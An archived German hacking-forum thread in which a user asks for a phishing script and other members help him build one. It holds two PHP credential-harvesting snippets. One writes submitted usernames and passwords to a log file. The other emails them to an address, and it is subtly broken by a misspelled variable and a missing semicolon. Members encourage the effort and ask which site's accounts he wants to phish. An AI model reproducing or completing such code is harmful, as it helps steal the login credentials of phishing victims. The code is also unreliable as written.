PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : Phishing Script



Cyboo
19.04.2010, 19:21
Hallo wer ist bereit mir ein Pishing Script für ne Seite zu machen?
schreibt mir ne PM wenn jemand Lust hat.

Danke

fred777
19.04.2010, 19:47
Wie wäre es denn sich mal selbst damit zu beschäftigen oder zumindest mal in der Phishing Section zu schauen, da gibt es ganze Packs.
Ansonsten schreib oder schick mal die Seite

Spitfire
19.04.2010, 20:15
Die 2 Minuten kannst du doch wohl selber dran arbeiten oder ?
Guck dir mal hier im Forum um.

Cyboo
19.04.2010, 21:05
ja hast recht..vielen dank...nur sind die meisten links schon dead oder nur mit premium acc zu downloaden etc. ich wär halt froh wenn mir jemand helfen könnte...ich kapiere eigt. schnell hab mir auch schon die Pishing threads durchgeschaut...aber naja bin halt zu dumm...bin jetzt da wo man sich mit dem ftp verbindet..verbunden werde ich alles nur weiter weiss nimmer

okay ich bin gerade bei der mail funtion wer kann mir da helfen und sagen was genau da rein kommt mit den zeichen kapier ich das nicht....kanns vllt. jemand ausfüllen? mit so erfundenen daten danke vorab

Log-Methode:
PHP-Code:
<?php
$dir = "/";
$username = $_POST['username'];
$password = $_POST['password'];
$title = $username;
$content = "Username: ".$username ."\r\nPassword: ".$password;
$filename = $dir.$title.".log";
$handle = fopen($filename, "w");
fwrite($handle, $content);
fclose($handle);
?>

poddels
19.04.2010, 21:08
das ist keine Mailfunktion, der Code erstellt eine txt Datei die den Username und das Passwort enthält.

Cyboo
19.04.2010, 21:13
okay ich geb nicht auf ist mir egal...kannst du mir vllt. sagen wie ich das anstelle das es die daten an meine email oder in einem log speichert? danke vorab

fred777
19.04.2010, 21:19
Dazu schau dir mal die mail Funktion von php an, allerdings ist ein Textfile mit writeonly Rechten leichter und effizienter.

maximum3213
19.04.2010, 21:27
Es würde mich einmal interessieren, welche Account´s du phisen möchtest, also von welcher Website? Dann könntest du mal die Quelltexte hier posten, die du bereits hast und ob du diese bereits getestet hast...

MfG

DJ Blackmaster
27.04.2010, 13:58
<?php
$username = $_POST['username'];
$password = $_POST['password'];
$betreff = "Neues Passwort von:".$username;
$nachricht = "Username: ".$username ."\r\nPassword: ".$password;
$emfaenger = "deine@email.adresse"
mail($empfaenger, $betreff, $nachricht);
?>

dürfte gehen